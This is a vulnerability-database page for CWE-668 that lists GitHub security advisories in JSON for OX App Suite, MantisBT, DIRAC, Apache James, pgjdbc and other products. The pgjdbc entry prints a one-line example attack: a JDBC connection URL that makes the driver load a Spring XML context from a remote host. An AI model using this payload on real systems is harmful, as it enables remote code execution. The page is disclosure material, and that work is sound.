CWE-668
DiscouragedExposure of Resource to Wrong Sphere
Abstraction: Class · Status: Draft
The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.
1251 vulnerabilities reference this CWE, most recent first.
GHSA-V583-7M9J-97CW
Vulnerability from github – Published: 2022-05-24 19:21 – Updated: 2022-07-13 00:01OX App Suite through 7.10.5 has Incorrect Access Control for retrieval of session information via the rampup action of the login API call.
{
"affected": [],
"aliases": [
"CVE-2021-38376"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-11-22T09:15:00Z",
"severity": "MODERATE"
},
"details": "OX App Suite through 7.10.5 has Incorrect Access Control for retrieval of session information via the rampup action of the login API call.",
"id": "GHSA-v583-7m9j-97cw",
"modified": "2022-07-13T00:01:34Z",
"published": "2022-05-24T19:21:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-38376"
},
{
"type": "WEB",
"url": "https://seclists.org/fulldisclosure/2021/Nov/43"
},
{
"type": "WEB",
"url": "https://www.open-xchange.com"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/165038/OX-App-Suite-7.10.5-Cross-Site-Scripting-Information-Disclosure.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V5Q9-W576-R6PH
Vulnerability from github – Published: 2022-12-06 09:30 – Updated: 2022-12-07 21:30In wlan driver, there is a possible missing permission check, This could lead to local information disclosure.
{
"affected": [],
"aliases": [
"CVE-2022-42766"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-668",
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-12-06T07:15:00Z",
"severity": "MODERATE"
},
"details": "In wlan driver, there is a possible missing permission check, This could lead to local information disclosure.",
"id": "GHSA-v5q9-w576-r6ph",
"modified": "2022-12-07T21:30:30Z",
"published": "2022-12-06T09:30:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42766"
},
{
"type": "WEB",
"url": "https://www.unisoc.com/en_us/secy/announcementDetail/1599588060988411006"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V63V-32VM-PX2M
Vulnerability from github – Published: 2022-01-31 00:00 – Updated: 2023-08-08 15:31Adenza AxiomSL ControllerView through 10.8.1 is vulnerable to user enumeration. An attacker can identify valid usernames on the platform because a failed login attempt produces a different error message when the username is valid.
{
"affected": [],
"aliases": [
"CVE-2022-24032"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-01-30T01:15:00Z",
"severity": "MODERATE"
},
"details": "Adenza AxiomSL ControllerView through 10.8.1 is vulnerable to user enumeration. An attacker can identify valid usernames on the platform because a failed login attempt produces a different error message when the username is valid.",
"id": "GHSA-v63v-32vm-px2m",
"modified": "2023-08-08T15:31:37Z",
"published": "2022-01-31T00:00:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-24032"
},
{
"type": "WEB",
"url": "https://github.com/jdordonezn/CVE-2022-24032/issues/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V642-MH27-8J6M
Vulnerability from github – Published: 2023-10-17 14:20 – Updated: 2025-08-11 14:48Impact
Due to insufficient access-level checks on the Wiki redirection page, any user can reveal private Projects' names, by accessing wiki.php with sequentially incremented IDs.
Patches
The vulnerability has been fixed in MantisBT version 2.25.8 (https://github.com/mantisbt/mantisbt/commit/65c44883f9d24f3ccef066fb523c93d8fdd7afc1).
Workarounds
Disable wiki integration ( $g_wiki_enable = OFF;)
References
- https://mantisbt.org/bugs/view.php?id=32981
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.25.7"
},
"package": {
"ecosystem": "Packagist",
"name": "mantisbt/mantisbt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.25.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-44394"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2023-10-17T14:20:36Z",
"nvd_published_at": "2023-10-16T22:15:12Z",
"severity": "MODERATE"
},
"details": "### Impact\n\nDue to insufficient access-level checks on the Wiki redirection page, any user can reveal private Projects\u0027 names, by accessing wiki.php with sequentially incremented IDs.\n\n### Patches\nThe vulnerability has been fixed in MantisBT version 2.25.8 (https://github.com/mantisbt/mantisbt/commit/65c44883f9d24f3ccef066fb523c93d8fdd7afc1).\n\n### Workarounds\nDisable wiki integration ( `$g_wiki_enable = OFF;`)\n\n### References\n- https://mantisbt.org/bugs/view.php?id=32981",
"id": "GHSA-v642-mh27-8j6m",
"modified": "2025-08-11T14:48:38Z",
"published": "2023-10-17T14:20:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mantisbt/mantisbt/security/advisories/GHSA-v642-mh27-8j6m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44394"
},
{
"type": "WEB",
"url": "https://github.com/mantisbt/mantisbt/commit/65c44883f9d24f3ccef066fb523c93d8fdd7afc1"
},
{
"type": "PACKAGE",
"url": "https://github.com/mantisbt/mantisbt"
},
{
"type": "WEB",
"url": "https://mantisbt.org/bugs/view.php?id=32981"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "MantisBT may disclose project names to unauthorized users "
}
GHSA-V6F3-GH5H-MQWX
Vulnerability from github – Published: 2024-04-09 15:52 – Updated: 2026-01-05 19:05Impact
During the proxy generation process (e.g., when using dirac-proxy-init) it is possible for unauthorized users on the same machine to gain read access to the proxy. This allows the user to then perform any action that is possible with the original proxy.
This vulnerability only exists for a short period of time (sub-millsecond) during the generation process.
Patches
Has the problem been patched? What versions should users upgrade to?
Workarounds
Setting the X509_USER_PROXY environment variable to a path that is inside a directory that is only readable to the current user avoids the potential risk. After the file has been written it can be safely copied to the standard location (/tmp/x509up_uNNNN).
References
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "DIRAC"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.0.41"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-29905"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2024-04-09T15:52:17Z",
"nvd_published_at": "2024-04-09T17:16:00Z",
"severity": "HIGH"
},
"details": "### Impact\n\nDuring the proxy generation process (e.g., when using `dirac-proxy-init`) it is possible for unauthorized users on the same machine to gain read access to the proxy. This allows the user to then perform any action that is possible with the original proxy.\n\nThis vulnerability only exists for a short period of time (sub-millsecond) during the generation process.\n\n### Patches\n\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n\nSetting the `X509_USER_PROXY` environment variable to a path that is inside a directory that is only readable to the current user avoids the potential risk. After the file has been written it can be safely copied to the standard location (`/tmp/x509up_uNNNN`).\n\n### References",
"id": "GHSA-v6f3-gh5h-mqwx",
"modified": "2026-01-05T19:05:03Z",
"published": "2024-04-09T15:52:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/DIRACGrid/DIRAC/security/advisories/GHSA-v6f3-gh5h-mqwx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29905"
},
{
"type": "WEB",
"url": "https://github.com/DIRACGrid/DIRAC/commit/1faa709341969a6321e29c843ca94039d33b2c3d"
},
{
"type": "PACKAGE",
"url": "https://github.com/DIRACGrid/DIRAC"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "DIRAC: Unauthorized users can read proxy contents during generation"
}
GHSA-V6VP-62VC-84QW
Vulnerability from github – Published: 2023-01-06 12:31 – Updated: 2023-01-12 16:48Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit. Vulnerable components includes the SMTP stack and IMAP APPEND command. This issue affects Apache James server version 3.7.2 and prior versions.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.james:james-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.7.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-45935"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-319",
"CWE-668"
],
"github_reviewed": true,
"github_reviewed_at": "2023-01-09T20:12:10Z",
"nvd_published_at": "2023-01-06T10:15:00Z",
"severity": "MODERATE"
},
"details": "Usage of temporary files with insecure permissions by the Apache James server allows an attacker with local access to access private user data in transit. Vulnerable components includes the SMTP stack and IMAP APPEND command. This issue affects Apache James server version 3.7.2 and prior versions.",
"id": "GHSA-v6vp-62vc-84qw",
"modified": "2023-01-12T16:48:58Z",
"published": "2023-01-06T12:31:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45935"
},
{
"type": "WEB",
"url": "https://github.com/apache/james-project/commit/b5580d13d6c74ecbf647127eff1a3ac1086f5493"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/james-project"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/j61fo8xc1rxtofrn8vc33whx35s9cj1d"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache James server allows an attacker with local access to access private user data in transit"
}
GHSA-V792-6MC6-G855
Vulnerability from github – Published: 2021-12-04 00:00 – Updated: 2023-08-08 15:31IBM Cognos Analytics 11.1.7 and 11.2.0 could be vulnerable to client side vulnerabilties due to a web response specifying an incorrect content type. IBM X-Force ID: 201091
{
"affected": [],
"aliases": [
"CVE-2021-29719"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-03T17:15:00Z",
"severity": "MODERATE"
},
"details": "IBM Cognos Analytics 11.1.7 and 11.2.0 could be vulnerable to client side vulnerabilties due to a web response specifying an incorrect content type. IBM X-Force ID: 201091",
"id": "GHSA-v792-6mc6-g855",
"modified": "2023-08-08T15:31:24Z",
"published": "2021-12-04T00:00:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29719"
},
{
"type": "WEB",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/201091"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20211223-0006"
},
{
"type": "WEB",
"url": "https://www.ibm.com/support/pages/node/6520510"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-V79C-W8QR-CHQ9
Vulnerability from github – Published: 2021-12-21 00:00 – Updated: 2023-08-08 15:31Zoho ManageEngine PAM360 before build 5303 allows attackers to modify a few aspects of application state because of a filter bypass in which authentication is not required.
{
"affected": [],
"aliases": [
"CVE-2021-44525"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-20T16:15:00Z",
"severity": "CRITICAL"
},
"details": "Zoho ManageEngine PAM360 before build 5303 allows attackers to modify a few aspects of application state because of a filter bypass in which authentication is not required.",
"id": "GHSA-v79c-w8qr-chq9",
"modified": "2023-08-08T15:31:26Z",
"published": "2021-12-21T00:00:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44525"
},
{
"type": "WEB",
"url": "https://pitstop.manageengine.com/portal/en/community/topic/title-security-advisory-for-cve-2021-44525-authentication-bypass-vulnerability-in-manageengine-pam360"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V79V-2CRM-C7VH
Vulnerability from github – Published: 2022-05-24 19:07 – Updated: 2022-05-24 19:07Information exposure vulnerability in Samsung Members prior to versions 2.4.85.11 in Android O(8.1) and below, and 3.9.10.11 in Android P(9.0) and above allows untrusted applications to access chat data.
{
"affected": [],
"aliases": [
"CVE-2021-25432"
],
"database_specific": {
"cwe_ids": [
"CWE-668"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-07-08T14:15:00Z",
"severity": "LOW"
},
"details": "Information exposure vulnerability in Samsung Members prior to versions 2.4.85.11 in Android O(8.1) and below, and 3.9.10.11 in Android P(9.0) and above allows untrusted applications to access chat data.",
"id": "GHSA-v79v-2crm-c7vh",
"modified": "2022-05-24T19:07:15Z",
"published": "2022-05-24T19:07:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-25432"
},
{
"type": "WEB",
"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2021\u0026month=7"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-V7WG-CPWC-24M4
Vulnerability from github – Published: 2022-02-02 00:04 – Updated: 2022-08-12 13:14Impact
pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.
However, the driver did not verify if the class implements the expected interface before instantiating the class.
Here's an example attack using an out-of-the-box class from Spring Framework:
DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");
The first impacted version is REL9.4.1208 (it introduced socketFactory connection property)
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.postgresql:postgresql"
},
"ranges": [
{
"events": [
{
"introduced": "9.4.1208"
},
{
"fixed": "42.2.25"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.postgresql:postgresql"
},
"ranges": [
{
"events": [
{
"introduced": "42.3.0"
},
{
"fixed": "42.3.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-21724"
],
"database_specific": {
"cwe_ids": [
"CWE-665",
"CWE-668",
"CWE-74"
],
"github_reviewed": true,
"github_reviewed_at": "2022-02-01T22:40:00Z",
"nvd_published_at": "2022-02-02T12:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\n\npgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.\n\nHowever, the driver did not verify if the class implements the expected interface before instantiating the class.\n\nHere\u0027s an example attack using an out-of-the-box class from Spring Framework:\n\n```\nDriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext\u0026socketFactoryArg=http://target/exp.xml\");\n```\n\nThe first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)",
"id": "GHSA-v7wg-cpwc-24m4",
"modified": "2022-08-12T13:14:09Z",
"published": "2022-02-02T00:04:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21724"
},
{
"type": "WEB",
"url": "https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813"
},
{
"type": "PACKAGE",
"url": "https://github.com/pgjdbc/pgjdbc"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20220311-0005"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2022/dsa-5196"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "pgjdbc Does Not Check Class Instantiation when providing Plugin Classes"
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.